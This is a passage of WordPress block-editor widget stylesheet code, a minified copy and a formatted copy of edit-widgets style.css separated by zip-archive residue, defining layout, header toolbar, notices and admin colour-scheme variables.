(min-width:600px){.edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle{padding-left:12px;padding-right:12px}}.edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle:after{content:none}@media not (prefers-reduced-motion){.edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle svg{transition:transform .2s cubic-bezier(.165,.84,.44,1)}}.edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle.is-pressed svg{transform:rotate(45deg)}.edit-widgets-keyboard-shortcut-help-modal__section{margin:0 0 2rem}.edit-widgets-keyboard-shortcut-help-modal__section-title{font-size:.9rem;font-weight:600}.edit-widgets-keyboard-shortcut-help-modal__shortcut{align-items:baseline;border-top:1px solid #ddd;display:flex;margin-bottom:0;padding:.6rem 0}.edit-widgets-keyboard-shortcut-help-modal__shortcut:last-child{border-bottom:1px solid #ddd}.edit-widgets-keyboard-shortcut-help-modal__shortcut:empty{display:none}.edit-widgets-keyboard-shortcut-help-modal__shortcut-term{font-weight:600;margin:0 0 0 1rem;text-align:right}.edit-widgets-keyboard-shortcut-help-modal__shortcut-description{flex:1;margin:0}.edit-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{background:none;display:block;margin:0;padding:0}.edit-widgets-keyboard-shortcut-help-modal__shortcut-key-combination+.edit-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{margin-top:10px}.edit-widgets-keyboard-shortcut-help-modal__shortcut-key{border-radius:8%;margin:0 .2rem;padding:.25rem .5rem}.edit-widgets-keyboard-shortcut-help-modal__shortcut-key:last-child{margin:0 0 0 .2rem}.components-panel__header.edit-widgets-sidebar__panel-tabs{padding-left:0}.edit-widgets-widget-areas__top-container{display:flex;padding:16px}.edit-widgets-widget-areas__top-container .block-editor-block-icon{margin-right:16px}.edit-widgets-notices__snackbar{bottom:20px;left:0;padding-left:16px;padding-right:16px;position:fixed;right:0}@media (min-width:783px){.edit-widgets-notices__snackbar{left:160px}}@media (min-width:783px){.auto-fold .edit-widgets-notices__snackbar{left:36px}}@media (min-width:961px){.auto-fold .edit-widgets-notices__snackbar{left:160px}}.folded .edit-widgets-notices__snackbar{left:0}@media (min-width:783px){.folded .edit-widgets-notices__snackbar{left:36px}}body.is-fullscreen-mode .edit-widgets-notices__snackbar{left:0!important}.edit-widgets-notices__dismissible .components-notice,.edit-widgets-notices__pinned .components-notice{border-bottom:1px solid #0003;box-sizing:border-box;min-height:64px;padding:0 12px}.edit-widgets-notices__dismissible .components-notice .components-notice__dismiss,.edit-widgets-notices__pinned .components-notice .components-notice__dismiss{margin-top:12px}.edit-widgets-layout__inserter-panel{display:flex;flex-direction:column;height:100%}.edit-widgets-layout__inserter-panel .block-editor-inserter__menu{overflow:hidden}.edit-widgets-layout__inserter-panel-content{height:calc(100% - 44px)}.edit-widgets-layout__inserter-panel-content .block-editor-inserter__tablist-and-close{display:none}@media (min-width:782px){.edit-widgets-layout__inserter-panel-content{height:100%}}.components-popover.more-menu-dropdown__content{z-index:99998}.edit-widgets-welcome-guide{width:312px}.edit-widgets-welcome-guide__image{background:#00a0d2;margin:0 0 16px}.edit-widgets-welcome-guide__image>img{display:block;max-width:100%;object-fit:cover}.edit-widgets-welcome-guide__heading{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:24px;line-height:1.4;margin:16px 0;padding:0 32px}.edit-widgets-welcome-guide__text{font-size:13px;line-height:1.4;margin:0 0 24px;padding:0 32px}.edit-widgets-welcome-guide__inserter-icon{margin:0 4px;vertical-align:text-top}.edit-widgets-block-editor{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;position:relative}.edit-widgets-block-editor,.edit-widgets-block-editor .block-editor-writing-flow,.edit-widgets-block-editor>div:last-of-type{display:flex;flex-direction:column;flex-grow:1}.edit-widgets-block-editor .edit-widgets-main-block-list{height:100%}.edit-widgets-block-editor .components-button{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px}.edit-widgets-block-editor .components-button.has-icon,.edit-widgets-block-editor .components-button.is-tertiary{padding:6px}.edit-widgets-editor__list-view-panel{display:flex;flex-direction:column;height:100%;min-width:350px}.edit-widgets-editor__list-view-panel-content{height:calc(100% - 44px);overflow-y:auto;padding:8px}.edit-widgets-editor__list-view-panel-header{align-items:center;border-bottom:1px solid #ddd;display:flex;height:48px;justify-content:space-between;padding-left:16px;padding-right:8px}body.js.appearance_page_gutenberg-widgets,body.js.widgets-php{background:#fff}body.js.appearance_page_gutenberg-widgets #wpcontent,body.js.widgets-php #wpcontent{padding-left:0}body.js.appearance_page_gutenberg-widgets #wpbody-content,body.js.widgets-php #wpbody-content{padding-bottom:0}body.js.appearance_page_gutenberg-widgets #wpbody-content>div:not(.blocks-widgets-container):not(#screen-meta),body.js.appearance_page_gutenberg-widgets #wpfooter,body.js.widgets-php #wpbody-content>div:not(.blocks-widgets-container):not(#screen-meta),body.js.widgets-php #wpfooter{display:none}body.js.appearance_page_gutenberg-widgets .a11y-speak-region,body.js.widgets-php .a11y-speak-region{left:-1px;top:-1px}body.js.appearance_page_gutenberg-widgets ul#adminmenu a.wp-has-current-submenu:after,body.js.appearance_page_gutenberg-widgets ul#adminmenu>li.current>a.current:after,body.js.widgets-php ul#adminmenu a.wp-has-current-submenu:after,body.js.widgets-php ul#adminmenu>li.current>a.current:after{border-right-color:#fff}body.js.appearance_page_gutenberg-widgets .media-frame select.attachment-filters:last-of-type,body.js.widgets-php .media-frame select.attachment-filters:last-of-type{max-width:100%;width:auto}.blocks-widgets-container{box-sizing:border-box}.blocks-widgets-container *,.blocks-widgets-container :after,.blocks-widgets-container :before{box-sizing:inherit}@media (min-width:600px){.blocks-widgets-container{bottom:0;left:0;min-height:calc(100vh - 46px);position:absolute;right:0;top:0}}@media (min-width:782px){.blocks-widgets-container{min-height:calc(100vh - 32px)}}.blocks-widgets-container .interface-interface-skeleton__content{background-color:#f0f0f0}.blocks-widgets-container .editor-styles-wrapper{margin:auto;max-width:700px}.edit-widgets-sidebar .components-button.interface-complementary-area__pin-unpin-item{display:none}.js .widgets-php .notice{display:none!important}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!dddist/edit-widgets/style.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .admin-ui-page{ background-color:#fff; color:#2f2f2f; container:admin-ui-page/inline-size; display:flex; flex-flow:column; height:100%; position:relative; z-index:1; } @media not (prefers-reduced-motion){ .admin-ui-page{ transition:width .2s ease-out; } } .admin-ui-page__header{ background:#fff; border-bottom:1px solid #f0f0f0; padding:16px 48px; position:sticky; top:0; } @container (max-width: 430px){ .admin-ui-page__header{ padding:16px 24px; } } .admin-ui-page__header-subtitle{ color:#757575; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; margin:0; padding-block-end:8px; } .admin-ui-page__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; } .admin-ui-page__content.has-padding{ padding:16px 20px; } @container (max-width: 430px){ .admin-ui-page__content.has-padding{ padding:16px 24px; } } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{ display:none; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; } .interface-complementary-area-header{ background:#fff; gap:4px; padding-right:8px; } .interface-complementary-area-header .interface-complementary-area-header__title{ margin:0 auto 0 0; } .interface-complementary-area{ background:#fff; color:#1e1e1e; height:100%; overflow:auto; } @media (min-width:600px){ .interface-complementary-area{ -webkit-overflow-scrolling:touch; } } @media (min-width:782px){ .interface-complementary-area{ width:280px; } } .interface-complementary-area .components-panel{ border:none; position:relative; z-index:0; } .interface-complementary-area .components-panel__header{ position:sticky; top:0; z-index:1; } .interface-complementary-area .components-panel__header.editor-sidebar__panel-tabs{ top:0; } .interface-complementary-area p:not(.components-base-control__help,.components-form-token-field__help){ margin-top:0; } .interface-complementary-area h2{ color:#1e1e1e; font-size:13px; font-weight:500; margin-bottom:1.5em; } .interface-complementary-area h3{ color:#1e1e1e; font-size:11px; font-weight:500; margin-bottom:1.5em; text-transform:uppercase; } .interface-complementary-area hr{ border-bottom:1px solid #f0f0f0; border-top:none; margin:1.5em 0; } .interface-complementary-area div.components-toolbar,.interface-complementary-area div.components-toolbar-group{ box-shadow:none; margin-bottom:1.5em; } .interface-complementary-area div.components-toolbar-group:last-child,.interface-complementary-area div.components-toolbar:last-child{ margin-bottom:0; } .interface-complementary-area .block-editor-skip-to-selected-block:focus{ bottom:10px; left:auto; right:10px; top:auto; } .interface-complementary-area__fill{ height:100%; } @media (min-width:782px){ body.js.is-fullscreen-mode{ height:calc(100% + 32px); margin-top:-32px; } body.js.is-fullscreen-mode #adminmenumain,body.js.is-fullscreen-mode #wpadminbar{ display:none; } body.js.is-fullscreen-mode #wpcontent,body.js.is-fullscreen-mode #wpfooter{ margin-left:0; } } html.interface-interface-skeleton__html-container{ position:fixed; width:100%; } @media (min-width:782px){ html.interface-interface-skeleton__html-container:not(:has(.is-zoom-out)){ position:static; width:auto; } } .interface-interface-skeleton{ bottom:0; display:flex; flex-direction:row; height:auto; max-height:100%; position:fixed; right:0; top:46px; } @media (min-width:783px){ .interface-interface-skeleton{ top:32px; } .is-fullscreen-mode .interface-interface-skeleton{ top:0; } } .interface-interface-skeleton__editor{ display:flex; flex:0 1 100%; flex-direction:column; overflow:hidden; } .interface-interface-skeleton{ left:0; } @media (min-width:783px){ .interface-interface-skeleton{ left:160px; } } @media (min-width:783px){ .auto-fold .interface-interface-skeleton{ left:36px; } } @media (min-width:961px){ .auto-fold .interface-interface-skeleton{ left:160px; } } .folded .interface-interface-skeleton{ left:0; } @media (min-width:783px){ .folded .interface-interface-skeleton{ left:36px; } } body.is-fullscreen-mode .interface-interface-skeleton{ left:0 !important; } .interface-interface-skeleton__body{ display:flex; flex-grow:1; overflow:auto; overscroll-behavior-y:none; position:relative; } @media (min-width:782px){ .has-footer .interface-interface-skeleton__body{ padding-bottom:25px; } } .interface-interface-skeleton__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; z-index:20; } @media (min-width:782px){ .interface-interface-skeleton__content{ z-index:auto; } } .interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{ background:#fff; bottom:0; color:#1e1e1e; flex-shrink:0; left:0; position:absolute; top:0; width:auto; z-index:100000; } @media (min-width:782px){ .interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{ position:relative !important; } } .interface-interface-skeleton__sidebar{ border-top:1px solid #e0e0e0; overflow:hidden; } @media (min-width:782px){ .interface-interface-skeleton__sidebar{ box-shadow:-1px 0 0 0 rgba(0,0,0,.133); outline:1px solid #0000; } } .interface-interface-skeleton__secondary-sidebar{ border-top:1px solid #e0e0e0; right:0; } @media (min-width:782px){ .interface-interface-skeleton__secondary-sidebar{ box-shadow:1px 0 0 0 rgba(0,0,0,.133); outline:1px solid #0000; } } .interface-interface-skeleton__header{ box-shadow:0 1px 0 0 rgba(0,0,0,.133); color:#1e1e1e; flex-shrink:0; height:auto; outline:1px solid #0000; z-index:30; } .interface-interface-skeleton__footer{ background-color:#fff; border-top:1px solid #e0e0e0; bottom:0; color:#1e1e1e; display:none; flex-shrink:0; height:auto; left:0; position:absolute; width:100%; z-index:90; } @media (min-width:782px){ .interface-interface-skeleton__footer{ display:flex; } } .interface-interface-skeleton__footer .block-editor-block-breadcrumb{ align-items:center; background:#fff; display:flex; font-size:13px; height:24px; padding:0 18px; z-index:30; } .interface-interface-skeleton__actions{ background:#fff; bottom:auto; color:#1e1e1e; left:auto; position:fixed !important; right:0; top:-9999em; width:100vw; z-index:100000; } @media (min-width:782px){ .interface-interface-skeleton__actions{ width:280px; } } .interface-interface-skeleton__actions:focus,.interface-interface-skeleton__actions:focus-within{ bottom:0; top:auto; } .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{ top:46px; } @media (min-width:782px){ .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{ border-left:1px solid #ddd; top:32px; } .is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{ top:0; } } .interface-pinned-items{ display:flex; } .interface-pinned-items .components-button{ display:none; margin:0; } .interface-pinned-items .components-button[aria-controls="edit-post:block"],.interface-pinned-items .components-button[aria-controls="edit-post:document"],.interface-pinned-items .components-button[aria-controls="edit-site:block-inspector"],.interface-pinned-items .components-button[aria-controls="edit-site:template"]{ display:flex; } .interface-pinned-items .components-button svg{ max-height:24px; max-width:24px; } @media (min-width:600px){ .interface-pinned-items .components-button{ display:flex; } } .interface-pinned-items{ gap:8px; } .wp-block[data-type="core/widget-area"]{ margin-left:auto; margin-right:auto; max-width:700px; } .wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title{ background:#fff; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; height:48px; margin:0; position:relative; transform:translateZ(0); z-index:1; } .wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title:hover{ background:#fff; } .wp-block[data-type="core/widget-area"] .block-list-appender.wp-block{ position:relative; width:auto; } .wp-block[data-type="core/widget-area"] .editor-styles-wrapper .wp-block.wp-block.wp-block.wp-block.wp-block{ max-width:100%; } .wp-block[data-type="core/widget-area"] .components-panel__body.is-opened{ padding:0; } .blocks-widgets-container .wp-block-widget-area__inner-blocks.editor-styles-wrapper{ margin:0; padding:0; } .blocks-widgets-container .wp-block-widget-area__inner-blocks.editor-styles-wrapper>.block-editor-block-list__layout{ margin-top:-48px; min-height:32px; padding:72px 16px 16px; } .wp-block-widget-area__highlight-drop-zone{ outline:var(--wp-admin-border-width-focus) solid var(--wp-admin-theme-color); } body.is-dragging-components-draggable .wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title,body.is-dragging-components-draggable .wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title *{ pointer-events:none; } .edit-widgets-error-boundary{ box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005; margin:64px auto auto; max-width:780px; padding:20px; } .edit-widgets-header{ align-items:center; background:#fff; display:flex; height:64px; justify-content:space-between; overflow:auto; } @media (min-width:600px){ .edit-widgets-header{ overflow:visible; } } .edit-widgets-header .selected-block-tools-wrapper{ align-items:center; display:flex; height:64px; overflow:hidden; } .edit-widgets-header .selected-block-tools-wrapper .block-editor-block-contextual-toolbar{ border-bottom:0; height:100%; } .edit-widgets-header .selected-block-tools-wrapper .block-editor-block-toolbar{ height:100%; padding-top:17px; } .edit-widgets-header .selected-block-tools-wrapper .block-editor-block-toolbar .components-button:not(.block-editor-block-mover-button){ height:32px; } .edit-widgets-header .selected-block-tools-wrapper .components-toolbar,.edit-widgets-header .selected-block-tools-wrapper .components-toolbar-group{ border-right:none; } .edit-widgets-header .selected-block-tools-wrapper .components-toolbar-group:after,.edit-widgets-header .selected-block-tools-wrapper .components-toolbar:after{ background-color:#ddd; content:""; height:24px; margin-left:8px; margin-top:4px; width:1px; } .edit-widgets-header .selected-block-tools-wrapper .components-toolbar .components-toolbar-group.components-toolbar-group:after,.edit-widgets-header .selected-block-tools-wrapper .components-toolbar-group .components-toolbar-group.components-toolbar-group:after{ display:none; } .edit-widgets-header .selected-block-tools-wrapper .block-editor-block-mover.is-horizontal .block-editor-block-mover-button{ height:32px; overflow:visible; } @media (min-width:600px){ .edit-widgets-header .selected-block-tools-wrapper .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container{ position:relative; top:-10px; } } .edit-widgets-header__navigable-toolbar-wrapper{ align-items:center; display:flex; flex-shrink:2; height:64px; justify-content:center; overflow:hidden; padding-left:16px; padding-right:8px; } .edit-widgets-header__title{ font-size:20px; margin:0 20px 0 0; padding:0; } .edit-widgets-header__actions{ align-items:center; display:flex; padding-right:4px; } @media (min-width:600px){ .edit-widgets-header__actions{ padding-right:8px; } } .edit-widgets-header__actions{ gap:8px; } .edit-widgets-header-toolbar{ gap:8px; margin-right:8px; } .edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon,.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon{ height:32px; min-width:32px; padding:4px; } .edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon.is-pressed,.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon.is-pressed{ background:#1e1e1e; } .edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon:focus:not(:disabled),.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon:focus:not(:disabled){ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color), inset 0 0 0 1px #fff; outline:1px solid #0000; } .edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon:before,.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon:before{ display:none; } .edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle{ padding-left:8px; padding-right:8px; } @media (min-width:600px){ .edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle{ padding-left:12px; padding-right:12px; } } .edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle:after{ content:none; } @media not (prefers-reduced-motion){ .edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle svg{ transition:transform .2s cubic-bezier(.165, .84, .44, 1); } } .edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle.is-pressed svg{ transform:rotate(45deg); } .edit-widgets-keyboard-shortcut-help-modal__section{ margin:0 0 2rem; } .edit-widgets-keyboard-shortcut-help-modal__section-title{ font-size:.9rem; font-weight:600; } .edit-widgets-keyboard-shortcut-help-modal__shortcut{ align-items:baseline; border-top:1px solid #ddd; display:flex; margin-bottom:0; padding:.6rem 0; } .edit-widgets-keyboard-shortcut-help-modal__shortcut:last-child{ border-bottom:1px solid #ddd; } .edit-widgets-keyboard-shortcut-help-modal__shortcut:empty{ display:none; } .edit-widgets-keyboard-shortcut-help-modal__shortcut-term{ font-weight:600; margin:0 0 0 1rem; text-align:right; } .edit-widgets-keyboard-shortcut-help-modal__shortcut-description{ flex:1; margin:0; } .edit-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{ background:none; display:block; margin:0; padding:0; } .edit-widgets-keyboard-shortcut-help-modal__shortcut-key-combination+.edit-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{ margin-top:10px; } .edit-widgets-keyboard-shortcut-help-modal__shortcut-key{ border-radius:8%; margin:0 .2rem; padding:.25rem .5rem; } .edit-widgets-keyboard-shortcut-help-modal__shortcut-key:last-child{ margin:0 0 0 .2rem; } .components-panel__header.edit-widgets-sidebar__panel-tabs{ padding-left:0; } .edit-widgets-widget-areas__top-container{ display:flex; padding:16px; } .edit-widgets-widget-areas__top-container .block-editor-block-icon{ margin-right:16px; } .edit-widgets-notices__snackbar{ bottom:20px; left:0; padding-left:16px; padding-right:16px; position:fixed; right:0; } @media (min-width:783px){ .edit-widgets-notices__snackbar{ left:160px; } } @media (min-width:783px){ .auto-fold .edit-widgets-notices__snackbar{ left:36px; } } @media (min-width:961px){ .auto-fold .edit-widgets-notices__snackbar{ left:160px; } } .folded .edit-widgets-notices__snackbar{ left:0; } @media (min-width:783px){ .folded .edit-widgets-notices__snackbar{ left:36px; } } body.is-fullscreen-mode .edit-widgets-notices__snackbar{ left:0 !important; } .edit-widgets-notices__dismissible .components-notice,.edit-widgets-notices__pinned .components-notice{ border-bottom:1px solid #0003; box-sizing:border-box; min-height:64px; padding:0 12px; } .edit-widgets-notices__dismissible .components-notice .components-notice__dismiss,.edit-widgets-notices__pinned .components-notice .components-notice__dismiss{ margin-top:12px; } .edit-widgets-layout__inserter-panel{ display:flex; flex-direction:column; height:100%; } .edit-widgets-layout__inserter-panel .block-editor-inserter__menu{ overflow:hidden; } .edit-widgets-layout__inserter-panel-content{ height:calc(100% - 44px); } .edit-widgets-layout__inserter-panel-content .block-editor-inserter__tablist-and-close{ display:none; } @media (min-width:782px){ .edit-widgets-layout__inserter-panel-content{ height:100%; } } .components-popover.more-menu-dropdown__content{ z-index:99998; } .edit-widgets-welcome-guide{ width:312px; } .edit-widgets-welcome-guide__image{ background:#00a0d2; margin:0 0 16px; } .edit-widgets-welcome-guide__image>img{ display:block; max-width:100%; object-fit:cover; } .edit-widgets-welcome-guide__heading{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:24px; line-height:1.4; margin:16px 0; padding:0 32px; } .edit-widgets-welcome-guide__text{ font-size:13px; line-height:1.4; margin:0 0 24px; padding:0 32px; } .edit-widgets-welcome-guide__inserter-icon{ margin:0 4px; vertical-align:text-top; } .edit-widgets-block-editor{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; position:relative; } .edit-widgets-block-editor,.edit-widgets-block-editor .block-editor-writing-flow,.edit-widgets-block-editor>div:last-of-type{ display:flex; flex-direction:column; flex-grow:1; } .edit-widgets-block-editor .edit-widgets-main-block-list{ height:100%; } .edit-widgets-block-editor .components-button{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; } .edit-widgets-block-editor .components-button.has-icon,.edit-widgets-block-editor .components-button.is-tertiary{ padding:6px; } .edit-widgets-editor__list-view-panel{ display:flex; flex-direction:column; height:100%; min-width:350px; } .edit-widgets-editor__list-view-panel-content{ height:calc(100% - 44px); overflow-y:auto; padding:8px; } .edit-widgets-editor__list-view-panel-header{ align-items:center; border-bottom:1px solid #ddd; display:flex; height:48px; justify-content:space-between; padding-left:16px; padding-right:8px; } body.js.appearance_page_gutenberg-widgets,body.js.widgets-php{ background:#fff; } body.js.appearance_page_gutenberg-widgets #wpcontent,body.js.widgets-php #wpcontent{ padding-left:0; } body.js.appearance_page_gutenberg-widgets #wpbody-content,body.js.widgets-php #wpbody-content{ padding-bottom:0; } body.js.appearance_page_gutenberg-widgets #wpbody-content>div:not(.blocks-widgets-container):not(#screen-meta),body.js.appearance_page_gutenberg-widgets #wpfooter,body.js.widgets-php #wpbody-content>div:not(.blocks-widgets-container):not(#screen-meta),body.js.widgets-php #wpfooter{ display:none; } body.js.appearance_page_gutenberg-widgets .a11y-speak-region,body.js.widgets-php .a11y-speak-region{ left:-1px; top:-1px; } body.js.appearance_page_gutenberg-widgets ul#adminmenu a.wp-has-current-submenu:after,body.js.appearance_page_gutenberg-widgets ul#adminmenu>li.current>a.current:after,body.js.widgets-php ul#adminmenu a.wp-has-current-submenu:after,body.js.widgets-php ul#adminmenu>li.current>a.current:after{ border-right-color:#fff; } body.js.appearance_page_gutenberg-widgets .media-frame select.attachment-filters:last-of-type,body.js.widgets-php .media-frame select.attachment-filters:last-of-type{ max-width:100%; width:auto; } .blocks-widgets-container{ box-sizing:border-box; } .blocks-widgets-container *,.blocks-widgets-container :after,.blocks-widgets-container :before{ box-sizing:inherit; } @media (min-width:600px){ .blocks-widgets-container{ bottom:0; left:0; min-height:calc(100vh - 46px); position:absolute; right:0; top:0; } } @media (min-width:782px){ .blocks-widgets-container{ min-height:calc(100vh - 32px); } } .blocks-widgets-container .interface-interface-skeleton__content{ background-color:#f0f0f0; } .blocks-widgets-container .editor-styles-wrapper{ margin:auto; max-width:700px; } .edit-widgets-sidebar .components-button.interface-complementary-area__pin-unpin-item{ display:none; } .js .widgets-php .notice{ display:none !important; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; 